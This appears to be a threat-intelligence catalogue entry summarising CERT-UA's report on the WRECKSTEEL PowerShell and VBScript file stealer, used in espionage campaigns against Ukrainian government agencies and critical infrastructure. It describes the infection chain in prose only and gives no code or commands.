Cyber Espionage using PowerShell stealer WRECKSTEEL
Essential information
- Published
- 03/04/2025 18:27
- Modified
- 03/04/2025 19:04
- Tags
- 2025-04-03 critical-infrastructure cyber espionage file stealing government powershell ukraine vbscript wrecksteel
- Related entities
- 71 observables, 1 intrusion sets (apt), 9 techniques (mitre), 1 malware, 2 others
Description
Ukrainian government's CERT-UA has identified a series of cyberattacks against government agencies and critical infrastructure facilities in Ukraine during March 2025. The attacks, aimed at information theft, utilize compromised accounts to distribute emails with links to public file services. These links download a VBScript loader, which then launches a PowerShell script to search and upload specific file types using cURL. The malicious activity, tracked as UAC-0219, has been ongoing since fall 2024. The primary tool, classified as WRECKSTEEL, exists in both VBScript and PowerShell versions. Earlier attacks in 2024 used EXE files created with NSIS installers, containing decoy documents and the IrfanView program for screenshots. CERT-UA urges immediate reporting of any detected cyberattack signs.